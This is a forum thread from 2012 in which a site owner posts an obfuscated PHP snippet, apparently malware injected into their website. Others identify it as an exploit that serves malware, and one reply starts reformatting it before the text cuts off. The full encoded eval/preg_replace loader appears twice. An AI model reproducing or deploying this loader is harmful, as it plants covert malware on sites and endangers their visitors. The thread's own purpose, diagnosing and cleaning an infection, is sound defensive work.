Author Topic: Help De-Obfsucating Code (Read 226 times)

waltersart · « **on:** January 12, 2012, 10:33:15 PM »

Hi,

Can anyone de-obfuscate this for me?

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "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pO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXREYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0l2aDJZbHRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

I know it is serving a virus on my website and I know how to fix it, I'm just interested in what the code actually says in plain english.

Thanks.

EpicCyndaquil · « **Reply #1 on:** January 12, 2012, 11:14:18 PM »

That looks like a wordpress exploit that hit a couple of my sites one time. I'm pretty sure the code basically just provides the malware from another random website, and I'm fairly certain that many of these sites have been registered to the point where finding the specific one is meaningless.

(Or on second thought, is this the one that hit THH when it was hosted with GoDaddy?)

zzbomb · « **Reply #2 on:** January 13, 2012, 11:13:22 AM »

Quote from: EpicCyndaquil on January 12, 2012, 11:14:18 PM

That looks like a wordpress exploit that hit a couple of my sites one time. I'm pretty sure the code basically just provides the malware from another random website, and I'm fairly certain that many of these sites have been registered to the point where finding the specific one is meaningless.

(Or on second thought, is this the one that hit THH when it was hosted with GoDaddy?)

na the one that hit here was obvious. At least i dont remember any obfuscation.

Primefalcon · « **Reply #3 on:** January 13, 2012, 01:50:33 PM »

Quote from: zzbomb on January 13, 2012, 11:13:22 AM

Quote from: EpicCyndaquil on January 12, 2012, 11:14:18 PM
That looks like a wordpress exploit that hit a couple of my sites one time. I'm pretty sure the code basically just provides the malware from another random website, and I'm fairly certain that many of these sites have been registered to the point where finding the specific one is meaningless.

(Or on second thought, is this the one that hit THH when it was hosted with GoDaddy?)
na the one that hit here was obvious. At least i dont remember any obfuscation.

Looks like an exploit to me, either restore from back up, or5 use a bit of regex to hunt down and remove it

rvtraveller · « **Reply #4 on:** January 13, 2012, 05:04:08 PM »

Quote from: EpicCyndaquil on January 12, 2012, 11:14:18 PM

(Or on second thought, is this the one that hit THH when it was hosted with GoDaddy?)

I can confirm that was not the code that hit THH. The THH code was the standard "eval(base64_decode(" where as this appears to attempt to hide those functions even further.

Primefalcon · « **Reply #5 on:** January 13, 2012, 09:42:21 PM »

Quote from: rvtraveller on January 13, 2012, 05:04:08 PM

Quote from: EpicCyndaquil on January 12, 2012, 11:14:18 PM
(Or on second thought, is this the one that hit THH when it was hosted with GoDaddy?)

I can confirm that was not the code that hit THH. The THH code was the standard "eval(base64_decode(" where as this appears to attempt to hide those functions even further.

I had a smf forum exploit hit one of mine a while back and it was similar to what hit thh from what you just said, I have to admit, some of these damn obfuscations are clever to the extent they go...

Pinako · « **Reply #6 on:** January 14, 2012, 02:05:15 AM »

<edit>

* Pinako apologizes for the double-post; there's just too much stuff!

</edit>

I don't know about plain English... but who wants to step through the code with me? First of all, let there be line breaks:

Code: [Select]

<?php
@error_reporting(0);
if (!isset($eva1fYlbakBcVSir)) {
	$eva1fYlbakBcVSir = "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pO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXREYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0l2aDJZb